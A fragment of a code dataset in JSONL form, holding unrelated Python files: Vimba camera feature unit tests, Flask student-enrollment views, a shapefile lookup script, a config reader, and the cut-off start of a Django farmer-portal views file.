print(np.sqrt(np.mean(diff*diff))*2*EARTH_RAD/1000.)\n plt.scatter(v*2*EARTH_RAD/1000.,w*2*EARTH_RAD/1000.,s=80)\n plt.plot(plot_r*2*EARTH_RAD/1000.,plot_r*2*EARTH_RAD/1000.,'--',color='red',linewidth=3)\n plt.title(\"X Position\")\n plt.xlabel(\"Actual Error (km)\")\n plt.ylabel(\"Predicted Error (km)\")\n plt.xlim(-700,700)\n plt.ylim(-700,700)\n plt.tight_layout()\n plt.show()\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"124423550","text":"\"\"\"BSD 2-Clause License\n\nCopyright (c) 2019, Allied Vision Technologies GmbH\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport unittest\nimport threading\n\nfrom vimba import *\nfrom vimba.feature import *\n\n\nclass CamBaseFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n try:\n self.height = self.cam.get_feature_by_name('Height')\n\n except VimbaCameraError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'Height\\' not available.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_name(self):\n # Expectation: Return decoded FeatureName\n self.assertEqual(self.height.get_name(), 'Height')\n\n def test_get_flags(self):\n # Expectation: Return decoded FeatureFlags\n self.assertEqual(self.height.get_flags(), (FeatureFlags.Read, FeatureFlags.Write))\n\n def test_get_category(self):\n # Expectation: Return decoded category\n self.assertNotEqual(self.height.get_category(), '')\n\n def test_get_display_name(self):\n # Expectation: Return decoded category\n self.assertEqual(self.height.get_display_name(), 'Height')\n\n def test_get_polling_time(self):\n # Expectation: Return polling time. Only volatile features return\n # anything other than zero.\n self.assertEqual(self.height.get_polling_time(), 0)\n\n def test_get_unit(self):\n # Expectation: If Unit exists, return unit else return ''\n self.assertEqual(self.height.get_unit(), '')\n\n def test_get_representation(self):\n # Expectation: Get numeric representation if existing else ''\n self.assertEqual(self.height.get_representation(), '')\n\n def test_get_visibility(self):\n # Expectation: Get UI Visibility\n self.assertEqual(self.height.get_visibility(), FeatureVisibility.Beginner)\n\n def test_get_tooltip(self):\n # Expectation: Shall not raise anything\n self.assertNoRaise(self.height.get_tooltip)\n\n def test_get_description(self):\n # Expectation: Get decoded description\n self.assertNotEqual(self.height.get_description(), '')\n\n def test_get_sfnc_namespace(self):\n # Expectation: Get decoded sfnc namespace\n self.assertNotEqual(self.height.get_sfnc_namespace(), '')\n\n def test_is_streamable(self):\n # Expectation: Streamable features shall return True, others False\n self.assertNoRaise(self.height.is_streamable)\n\n def test_has_affected_features(self):\n # Expectation:Features that affect features shall return True, others False\n self.assertTrue(self.height.has_affected_features())\n\n def test_has_selected_features(self):\n # Expectation:Features that select features shall return True, others False\n self.assertFalse(self.height.has_selected_features())\n\n def test_get_access_mode(self):\n # Expectation: Read/Write Features return (True, True), ReadOnly return (True, False)\n self.assertEqual(self.height.get_access_mode(), (True, True))\n\n def test_is_readable(self):\n # Expectation: True if feature grant read access else False\n self.assertTrue(self.height.is_readable())\n\n def test_is_writeable(self):\n # Expectation: True if feature grant write access else False\n self.assertTrue(self.height.is_writeable())\n\n def test_change_handler(self):\n # Expectation: A given change handler is executed on value change.\n # Adding the same handler multiple times shall not lead to multiple executions.\n # The same goes for double unregister.\n\n class Handler:\n def __init__(self):\n self.event = threading.Event()\n self.call_cnt = 0\n\n def __call__(self, feat):\n self.call_cnt += 1\n self.event.set()\n\n handler = Handler()\n\n self.height.register_change_handler(handler)\n self.height.register_change_handler(handler)\n\n tmp = self.height.get()\n\n min_, _ = self.height.get_range()\n inc = self.height.get_increment()\n\n if min_ <= tmp - inc:\n self.height.set(tmp - inc)\n\n else:\n self.height.set(tmp + inc)\n\n handler.event.wait()\n\n self.height.unregister_change_handler(handler)\n self.height.unregister_change_handler(handler)\n\n self.height.set(tmp)\n\n self.assertEqual(handler.call_cnt, 1)\n\n def test_stringify_features(self):\n # Expectation: Each Feature must have a __str__ method. Depending on the Feature\n # current Values are queried, this can fail. In those cases, all exceptions are\n # fetched -> all features must be strinify able without raising any exception\n for feat in self.vimba.get_all_features():\n self.assertNoRaise(str, feat)\n\n for feat in self.cam.get_all_features():\n self.assertNoRaise(str, feat)\n\n\nclass CamBoolFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.feat = self.vimba.get_feature_by_name('UsbTLIsPresent')\n\n except VimbaFeatureError:\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'UsbTLIsPresent\\' not available.')\n\n def tearDown(self):\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: BoolFeature must return BoolFeature on get_type\n self.assertEqual(self.feat.get_type(), BoolFeature)\n\n def test_get(self):\n # Expectation: returns current boolean value.\n self.assertNoRaise(self.feat.get)\n\n def test_set(self):\n # Expectation: Raises invalid Access on non-writeable features.\n self.assertRaises(VimbaFeatureError, self.feat.set, True)\n\n\nclass CamCommandFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.feat = self.vimba.get_feature_by_name('ActionCommand')\n\n except VimbaFeatureError:\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'ActionCommand\\' not available.')\n\n def tearDown(self):\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: CommandFeature must return CommandFeature on get_type\n self.assertEqual(self.feat.get_type(), CommandFeature)\n\n\nclass CamEnumFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n try:\n self.feat_r = self.cam.get_feature_by_name('DeviceScanType')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'DeviceScanType\\' not available.')\n\n try:\n self.feat_rw = self.cam.get_feature_by_name('AcquisitionMode')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'AcquisitionMode\\' not available.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: EnumFeature must return EnumFeature on get_type\n self.assertEqual(self.feat_r.get_type(), EnumFeature)\n self.assertEqual(self.feat_rw.get_type(), EnumFeature)\n\n def test_entry_as_bytes(self):\n # Expectation: Get EnumEntry as encoded byte sequence\n expected = b'MultiFrame'\n entry = self.feat_rw.get_entry('MultiFrame')\n\n self.assertEqual(bytes(entry), expected)\n\n def test_entry_as_tuple(self):\n # Expectation: Get EnumEntry as (str, int)\n entry = self.feat_rw.get_entry('MultiFrame')\n self.assertEqual(entry.as_tuple(), self.feat_rw.get_entry(int(entry)).as_tuple())\n\n def test_get_all_entries(self):\n # Expectation: Get all possible enum entries regardless of the availability\n expected = (self.feat_r.get_entry('Areascan'),)\n\n for e in expected:\n self.assertIn(e, self.feat_r.get_all_entries())\n\n expected = (\n self.feat_rw.get_entry('SingleFrame'),\n self.feat_rw.get_entry('MultiFrame'),\n self.feat_rw.get_entry('Continuous')\n )\n\n for e in expected:\n self.assertIn(e, self.feat_rw.get_all_entries())\n\n def test_get_avail_entries(self):\n # Expectation: All returned enum entries must be available\n for e in self.feat_r.get_available_entries():\n self.assertTrue(e.is_available())\n\n for e in self.feat_rw.get_available_entries():\n self.assertTrue(e.is_available())\n\n def test_get_entry_int(self):\n # Expectation: Lookup a given entry by using an int as key.\n # Invalid keys must return VimbaFeatureError.\n\n expected = self.feat_r.get_all_entries()[0]\n self.assertEqual(self.feat_r.get_entry(int(expected)), expected)\n\n expected = self.feat_rw.get_all_entries()[1]\n self.assertEqual(self.feat_rw.get_entry(int(expected)), expected)\n\n self.assertRaises(VimbaFeatureError, self.feat_r.get_entry, -1)\n self.assertRaises(VimbaFeatureError, self.feat_rw.get_entry, -1)\n\n def test_get_entry_str(self):\n # Expectation: Lookup a given entry by using a str as key.\n # Invalid keys must return VimbaFeatureError.\n\n expected = self.feat_r.get_all_entries()[0]\n self.assertEqual(self.feat_r.get_entry(str(expected)), expected)\n\n expected = self.feat_rw.get_all_entries()[1]\n self.assertEqual(self.feat_rw.get_entry(str(expected)), expected)\n\n self.assertRaises(VimbaFeatureError, self.feat_r.get_entry, 'Should be invalid')\n self.assertRaises(VimbaFeatureError, self.feat_rw.get_entry, 'Should be invalid')\n\n def test_get(self):\n # Expectation: Get must return the current value.\n self.assertNoRaise(self.feat_r.get)\n self.assertNoRaise(self.feat_rw.get)\n\n def test_set_entry(self):\n # Expectation: Set given enum entry if feature is writable.\n # Raises:\n # - VimbaFeatureError if enum entry is from other enum feature.\n # - VimbaFeatureError if feature is read only\n\n # Read Only Feature\n entry = self.feat_r.get_all_entries()[0]\n self.assertRaises(VimbaFeatureError, self.feat_r.set, entry)\n\n # Read/Write Feature\n old_entry = self.feat_rw.get()\n\n try:\n # Normal operation\n self.assertNoRaise(self.feat_rw.set, self.feat_rw.get_entry(2))\n self.assertEqual(self.feat_rw.get(), self.feat_rw.get_entry(2))\n\n # Provoke FeatureError by setting the feature from the ReadOnly entry.\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, entry)\n\n finally:\n self.feat_rw.set(old_entry)\n\n def test_set_str(self):\n # Expectation: Set given enum entry string value if feature is writable.\n # Raises:\n # - VimbaFeatureError if given string is not associated with this feature.\n # - VimbaFeatureError if feature is read only\n\n # Read Only Feature\n self.assertRaises(VimbaFeatureError, self.feat_r.set, str(self.feat_r.get_entry(0)))\n\n # Read/Write Feature\n old_entry = self.feat_rw.get()\n\n try:\n # Normal operation\n self.assertNoRaise(self.feat_rw.set, str(self.feat_rw.get_entry(2)))\n self.assertEqual(self.feat_rw.get(), self.feat_rw.get_entry(2))\n\n # Provoke FeatureError by an invalid enum value\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, 'Hopefully invalid')\n\n finally:\n self.feat_rw.set(old_entry)\n\n def test_set_int(self):\n # Expectation: Set given enum entry int value if feature is writable.\n # Raises:\n # - VimbaFeatureError if given int is not associated with this feature.\n # - VimbaFeatureError if feature is read only\n\n # Read Only Feature\n self.assertRaises(VimbaFeatureError, self.feat_r.set, int(self.feat_r.get_entry(0)))\n\n # Read/Write Feature\n old_entry = self.feat_rw.get()\n\n try:\n # Normal operation\n self.assertNoRaise(self.feat_rw.set, int(self.feat_rw.get_entry(2)))\n self.assertEqual(self.feat_rw.get(), self.feat_rw.get_entry(2))\n\n # Provoke FeatureError by an invalid enum value\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, -23)\n\n finally:\n self.feat_rw.set(old_entry)\n\n def test_set_in_callback(self):\n # Expected behavior: A set operation within a change handler must\n # Raise a VimbaFeatureError to prevent an endless handler execution.\n\n class Handler:\n def __init__(self):\n self.raised = False\n self.event = threading.Event()\n\n def __call__(self, feat):\n try:\n feat.set(feat.get())\n\n except VimbaFeatureError:\n self.raised = True\n\n self.event.set()\n\n old_entry = self.feat_rw.get()\n\n try:\n handler = Handler()\n self.feat_rw.register_change_handler(handler)\n\n # Trigger change handler and wait for callback execution.\n self.feat_rw.set(self.feat_rw.get())\n handler.event.wait()\n\n self.assertTrue(handler.raised)\n\n finally:\n self.feat_rw.unregister_change_handler(handler)\n self.feat_rw.set(old_entry)\n\n\nclass CamFloatFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n try:\n self.feat_r = self.vimba.get_feature_by_name('Elapsed')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'Elapsed\\' not available.')\n\n try:\n self.feat_rw = self.cam.get_feature_by_name('ExposureTime')\n\n except VimbaFeatureError:\n # Some Cameras name ExposureTime as ExposureTimeAbs\n try:\n self.feat_rw = self.cam.get_feature_by_name('ExposureTimeAbs')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'ExposureTime\\' not available.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: FloatFeature returns FloatFeature on get_type.\n self.assertEqual(self.feat_r.get_type(), FloatFeature)\n self.assertEqual(self.feat_rw.get_type(), FloatFeature)\n\n def test_get(self):\n # Expectation: Get current value.\n\n self.assertNoRaise(self.feat_r.get)\n self.assertNoRaise(self.feat_rw.get)\n\n def test_get_range(self):\n # Expectation: Get value range. Raise VimbaFeatureError on non-read access.\n self.assertNoRaise(self.feat_r.get_range)\n self.assertNoRaise(self.feat_rw.get_range)\n\n def test_get_increment(self):\n # Expectation: Get value increment if existing. If this Feature has no\n # increment, None is returned.\n\n self.assertNoRaise(self.feat_r.get_increment)\n self.assertNoRaise(self.feat_rw.get_increment)\n\n def test_set(self):\n # Expectation: Set value. Errors:\n # VimbaFeatureError if access right are not writable\n # VimbaFeatureError if value is out of bounds\n\n # Read only feature\n self.assertRaises(VimbaFeatureError, self.feat_r.set, 0.0)\n\n # Read/Write Feature\n old_value = self.feat_rw.get()\n\n try:\n delta = 0.1\n\n # Range test\n min_, max_ = self.feat_rw.get_range()\n\n # Within bounds (no error)\n self.assertNoRaise(self.feat_rw.set, min_)\n self.assertAlmostEqual(self.feat_rw.get(), min_)\n self.assertNoRaise(self.feat_rw.set, max_)\n self.assertAlmostEqual(self.feat_rw.get(), max_)\n\n # Out of bounds (must raise)\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, min_ - delta)\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, max_ + delta)\n\n finally:\n self.feat_rw.set(old_value)\n\n def test_set_in_callback(self):\n # Expectation: Calling set within change_handler must raise an VimbaFeatureError\n\n class Handler:\n def __init__(self):\n self.raised = False\n self.event = threading.Event()\n\n def __call__(self, feat):\n try:\n feat.set(feat.get())\n\n except VimbaFeatureError:\n self.raised = True\n\n self.event.set()\n\n old_entry = self.feat_rw.get()\n\n try:\n handler = Handler()\n self.feat_rw.register_change_handler(handler)\n\n # Trigger change handler and wait for callback execution.\n self.feat_rw.set(self.feat_rw.get())\n handler.event.wait()\n\n self.assertTrue(handler.raised)\n\n finally:\n self.feat_rw.unregister_change_handler(handler)\n self.feat_rw.set(old_entry)\n\n\nclass CamIntFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n try:\n self.feat_r = self.cam.get_feature_by_name('HeightMax')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'HeightMax\\' not available.')\n\n try:\n self.feat_rw = self.cam.get_feature_by_name('Height')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'Height\\' not available.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: IntFeature must return IntFeature on get_type\n self.assertEqual(self.feat_r.get_type(), IntFeature)\n self.assertEqual(self.feat_rw.get_type(), IntFeature)\n\n def test_get(self):\n # Expectation: Get current value\n\n self.assertNoRaise(self.feat_r.get)\n self.assertNoRaise(self.feat_rw.get)\n\n def test_get_range(self):\n # Expectation: Get range of accepted values\n self.assertNoRaise(self.feat_r.get_range)\n self.assertNoRaise(self.feat_rw.get_range)\n\n def test_get_increment(self):\n # Expectation: Get step between valid values\n self.assertNoRaise(self.feat_r.get_increment)\n self.assertNoRaise(self.feat_rw.get_increment)\n\n def test_set(self):\n # Expectation: Set value or raise VimbaFeatureError under the following conditions.\n # 1) Invalid Access Rights\n # 2) Misaligned value.\n # 3) Out-of-bounds Access\n\n # Read only feature\n self.assertRaises(VimbaFeatureError, self.feat_r.set, 0)\n\n # Writable feature\n old_value = self.feat_rw.get()\n\n try:\n inc = self.feat_rw.get_increment()\n min_, max_ = self.feat_rw.get_range()\n\n # Normal usage\n self.assertNoRaise(self.feat_rw.set, min_)\n self.assertEqual(self.feat_rw.get(), min_)\n self.assertNoRaise(self.feat_rw.set, max_)\n self.assertEqual(self.feat_rw.get(), max_)\n\n # Out of bounds access.\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, min_ - inc)\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, max_ + inc)\n\n finally:\n self.feat_rw.set(old_value)\n\n def test_set_in_callback(self):\n # Expectation: Setting a value within a Callback must raise a VimbaFeatureError\n\n class Handler:\n def __init__(self):\n self.raised = False\n self.event = threading.Event()\n\n def __call__(self, feat):\n try:\n feat.set(feat.get())\n\n except VimbaFeatureError:\n self.raised = True\n\n self.event.set()\n\n old_entry = self.feat_rw.get()\n\n try:\n handler = Handler()\n self.feat_rw.register_change_handler(handler)\n\n # Trigger change handler and wait for callback execution.\n min_, _ = self.feat_rw.get_range()\n inc = self.feat_rw.get_increment()\n\n if min_ <= (old_entry - inc):\n self.feat_rw.set(old_entry - inc)\n\n else:\n self.feat_rw.set(old_entry + inc)\n\n handler.event.wait()\n\n self.assertTrue(handler.raised)\n\n finally:\n self.feat_rw.unregister_change_handler(handler)\n self.feat_rw.set(old_entry)\n\n\nclass CamStringFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n self.feat_r = None\n feats = self.cam.get_features_by_type(StringFeature)\n\n for feat in feats:\n if feat.get_access_mode() == (True, False):\n self.feat_r = feat\n\n if self.feat_r is None:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Test requires read only StringFeature.')\n\n self.feat_rw = None\n feats = self.cam.get_features_by_type(StringFeature)\n\n for feat in feats:\n if feat.get_access_mode() == (True, True):\n self.feat_rw = feat\n\n if self.feat_rw is None:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Test requires read/write StringFeature.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: StringFeature must return StringFeature on get_type\n self.assertEqual(self.feat_r.get_type(), StringFeature)\n self.assertEqual(self.feat_rw.get_type(), StringFeature)\n\n def test_get(self):\n # Expectation: Get current value without raising an exception\n self.assertNoRaise(self.feat_r.get)\n self.assertNoRaise(self.feat_rw.get)\n\n def test_get_max_length(self):\n # Expectation: Get maximum string length\n self.assertNoRaise(self.feat_r.get_max_length)\n self.assertNoRaise(self.feat_rw.get_max_length)\n\n def test_set(self):\n # Expectation:\n # 1) Setting a read only feature must raise a VimbaFeatureError\n # 2) Setting a read/wrtie must raise VimbaFeatureError if the string is\n # longer than max length\n # 3) Setting a read/write feature must work if string is long enough\n\n # Ensure Expectation 1\n self.assertRaises(VimbaFeatureError, self.feat_r.set, self.feat_r.get())\n self.assertNoRaise(self.feat_rw.set, self.feat_rw.get())\n\n # Ensure Expectation 2\n old_val = self.feat_rw.get()\n\n try:\n invalid = 'a' * self.feat_rw.get_max_length()\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, invalid)\n\n finally:\n self.feat_rw.set(old_val)\n\n # Ensure Expectation 3\n try:\n valid = 'a' * (self.feat_rw.get_max_length() - 1)\n self.assertNoRaise(self.feat_rw.set, valid)\n self.assertEqual(valid, self.feat_rw.get())\n\n finally:\n self.feat_rw.set(old_val)\n\n def test_set_in_callback(self):\n # Expectation: Setting a value within a Callback must raise a VimbaFeatureError\n\n class Handler:\n def __init__(self):\n self.raised = False\n self.event = threading.Event()\n\n def __call__(self, feat):\n try:\n feat.set(feat.get())\n\n except VimbaFeatureError:\n self.raised = True\n\n self.event.set()\n\n try:\n handler = Handler()\n self.feat_rw.register_change_handler(handler)\n\n self.feat_rw.set(self.feat_rw.get())\n\n handler.event.wait()\n\n self.assertTrue(handler.raised)\n\n finally:\n self.feat_rw.unregister_change_handler(handler)\n","sub_path":"Tests/real_cam_tests/feature_test.py","file_name":"feature_test.py","file_ext":"py","file_size_in_byte":27771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"537554696","text":"from flask import render_template, redirect, request, url_for, flash\nfrom flask_login import login_user, logout_user, login_required, \\\n current_user\nfrom . import student\nfrom .. import db\nfrom ..models import User, Student, Session, Permission\nfrom ..email import send_email\nfrom .forms import NewStudentForm, RegisterSessionForm, EditProfileForm\nfrom ..decorators import authority_required\n\n\n#ST1\n@student.route('/student?student=', methods=['GET', 'POST'])\n@login_required\ndef profile(student_id):\n student = Student.query.filter_by(id=student_id).first_or_404()\n user_id = student.user_id\n user = User.query.filter_by(id=user_id).first_or_404()\n sessions = student.get_sessions()\n if not current_user.has_student(student) and not current_user.is_admin() \\\n and not current_user.is_teacing(student):\n abort(403)\n return render_template('student/student.html', student=student, user = user, sessions = sessions)\n\n\n#ST2\n@student.route('/add?user=', methods=['GET', 'POST'])\n@login_required\n@authority_required(Permission.ADMIN)\ndef addstudent(user_id):\n form = NewStudentForm()\n if form.validate_on_submit():\n student = Student(last_name = form.lastname.data,\n first_name = form.firstname.data,\n middle_name = form.middlename.data,\n chinese_name = form.chname.data,\n birthday = form.birthday.data,\n user = User.query.filter_by(id=user_id).first_or_404())\n db.session.add(student)\n db.session.commit()\n return redirect(url_for('user.account',user_id=user_id))\n return render_template(\"student/addstudent.html\", form=form)\n\n\n#ST3\n@student.route('/edit?student=', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(student_id):\n student = Student.query.filter_by(id=student_id).first_or_404()\n form = EditProfileForm()\n if form.validate_on_submit():\n student.last_name = form.lastname.data\n student.first_name = form.firstname.data\n student.middle_name = form.middlename.data\n student.chinese_name = form.chinesename.data\n db.session.add(student)\n flash('The student profile has been updated.')\n return redirect(url_for('.profile', student_id=student.id))\n form.firstname.data = student.first_name\n form.lastname.data = student.last_name\n form.middlename.data = student.middle_name\n form.chinesename.data = student.chinese_name\n return render_template('student/edit_student.html', form=form, student=student)\n\n\n#S\n@student.route('/sessionlist??student=', methods=['GET', 'POST'])\n@login_required\ndef sessionlist(student_id):\n student = Student.query.filter_by(id=student_id).first_or_404()\n sessions = Session.query.all()\n return render_template('student/sessionlist.html', sessions=sessions, student=student)\n\n\n\n\n#ST4\n@student.route('/register?student=&session=', methods=['GET', 'POST'])\n@login_required\ndef register(student_id,session_id):\n student = Student.query.filter_by(id=student_id).first_or_404()\n session = Session.query.filter_by(id=session_id).first_or_404()\n student.register(session)\n flash('Student %s are now enrolled.'%(student.first_name))\n return redirect(url_for('.profile',student_id=student.id))\n\n\n@student.route('/register?student=', methods=['GET', 'POST'])\n@login_required\ndef enroll(student_id):\n student = Student.query.filter_by(id=student_id).first_or_404()\n session = Session.query.filter_by(id=session_id).first_or_404()\n student.register(session)\n flash('You are noe enrolled.')\n return redirect(url_for('.profile',student_id=student.id))\n\n\n#ST5\n@student.route('/browse', methods=['GET', 'POST'])\ndef browse():\n students = Student.query.all()\n return render_template(\"student/student_browse.html\", students=students)\n\n@student.route('/quit?student=&session=', methods=['GET', 'POST'])\ndef quit():\n pass\n\n\n@student.route('/delete?student=', methods=['GET', 'POST'])\ndef delete(student_id):\n student = Student.query.filter_by(id=student_id).first_or_404()\n if not current_user.has_student(student) and not current_user.is_admin():\n abort(403)\n db.session.delete(student)\n db.session.commit()\n flash('Student is deleted.')\n return render_template('ccl.html')","sub_path":"web/app/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"281476076","text":"import shapefile\n\nfile = raw_input()\nfield = raw_input()\nvalue = raw_input()\nfieldShow = raw_input()\n\n##file=r'C:\\Layers\\Lakes.shp'\n##field = 'id'\n##value = '500460'\n##fieldShow = 'name'\n\n##file=r'D:\\GeoServer 2.11.1\\data_dir\\data\\ELake\\Base\\adm1pol.shp'\n##field = 'kato_te'\n##value = '110000000'\n##fieldShow = 'name_adm1'\n\nsf = shapefile.Reader(file)\nfieldIndex = 1\ncurrentIndex = 0\nfieldIndexShow = 1\ncurrentIndexShow = 0\nfor sr in sf.fields:\n currentIndex += 1\n currentIndexShow += 1\n if field == sr[0]:\n fieldIndex = currentIndex\n if fieldShow == sr[0]:\n fieldIndexShow = currentIndexShow\n\nfieldIndex = fieldIndex - 1\nfieldIndexShow = fieldIndexShow - 1\nr = ''\nfor sr in sf.shapeRecords():\n if(str(sr.record[fieldIndex-1:fieldIndex][0]) == value):\n r = sr.record[fieldIndexShow-1:fieldIndexShow][0]\n break\n\nprint (r.decode('utf-8'))\n##print r\n","sub_path":"ELake/Python/GetFeatureField.py","file_name":"GetFeatureField.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"334916563","text":"import configparser\nfrom conf.project_path import *\n\nclass ReadConfigFile():\n def __init__(self):\n self.config = configparser.ConfigParser()\n self.config.read(conf_path+\"/config.ini\")\n\n def get_env(self):\n env_value=str(self.get_value(\"env\",\"run_env\"))\n print(\"************\",env_value)\n domain_value=self.get_value(env_value,\"domain\")\n url_value = self.get_value(env_value, \"url\")\n return domain_value,url_value\n\n def get_devicesinfo(self):\n devicesvalue= self.get_value(\"devices\", \"devicesinfo\")\n uid=self.get_value(\"devices\", \"uid\")\n query_replyinfo=self.get_value(\"devices\",\"query_reply_info\")\n return uid,devicesvalue,query_replyinfo\n\n def get_value(self,section_value,option_value):\n value = self.config.get(section_value, option_value)\n return value\n","sub_path":"AITEST/conf/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"581281048","text":"\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.db import IntegrityError\nfrom django.contrib.auth import authenticate, login, logout\nimport json\nimport urllib.request\nimport requests\nfrom django.contrib import auth\nimport os\nfrom django.contrib.auth.models import User\nfrom .models import LoanSchemeForFarmers\nfrom .models import CropInfo\nfrom .models import extendeduser\nimport json\nfrom .models import approvals\nfrom .models import MarketPrices\nfrom .models import PestControl\nfrom .models import WillPlant\nfrom django.contrib.auth.decorators import login_required\n#import twilio\n# from twilio.rest import Client\nimport threading\nimport datetime\nuser_data=extendeduser.objects.values('phone','town','user')\ndef printit():\n threading.Timer(10, printit).start()\n for i in user_data:\n city = i['town']\n src = 'http://api.openweathermap.org/data/2.5/weather?appid=e995a3bb90b825a2202b9786e17caa56&q='\n url = src + city\n list_of_data = requests.get(url).json()\n temp = list_of_data['main']['temp']\n newtmp = round(temp - 273.15, 3)\n condition = list_of_data['weather'][0]['description']\n humidity = list_of_data['main']['humidity']\n data = {\n \"city\": city,\n \"temp\": newtmp,\n \"humidity\": humidity,\n \"condition\": condition,\n \"icon\": 